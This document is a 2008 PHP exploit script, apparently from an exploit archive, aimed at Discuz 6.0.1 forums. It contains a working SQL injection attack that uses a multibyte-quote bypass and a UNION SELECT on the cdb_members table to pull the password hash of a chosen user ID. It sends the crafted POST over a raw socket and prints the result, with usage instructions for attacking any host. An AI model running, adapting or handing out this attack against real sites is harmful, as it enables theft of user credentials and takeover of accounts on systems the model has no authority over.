discuzi-sql.txt
Posted on 07 August 2008
<?php error_reporting(E_ALL&E_NOTICE); print_r(" +------------------------------------------------------------------+ Exploit discuz6.0.1 Just work as php>=5 & mysql>=4.1 BY james +------------------------------------------------------------------+ "); if($argc>4) { $host=$argv[1]; $port=$argv[2]; $path=$argv[3]; $uid=$argv[4]; }else{ echo "Usage: php ".$argv[0]." host port path uid "; echo "host: target server "; echo "port: the web port, usually 80 "; echo "path: path to discuz "; echo "uid : user ID you wanna get "; echo "Example: "; echo "php ".$argv[0]." localhost 80 1 "; exit; } $content ="action=search&searchid=22%cf'UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=".$uid."/*&do=submit"; $data = "POST /".$path."/index.php"." HTTP/1.1 "; $data .= "Accept: */* "; $data .= "Accept-Language: zh-cn "; $data .= "Content-Type: application/x-www-form-urlencoded "; $data .= "User-Agent: wap "; $data .= "Host: ".$host." "; $data .= "Content-length: ".strlen($content)." "; $data .= "Connection: Close "; $data .= " "; $data .= $content." "; $ock=fsockopen($host,$port); if (!$ock) { echo 'No response from '.$host; die; } fwrite($ock,$data); while (!feof($ock)) { echo fgets($ock, 1024); } ?>
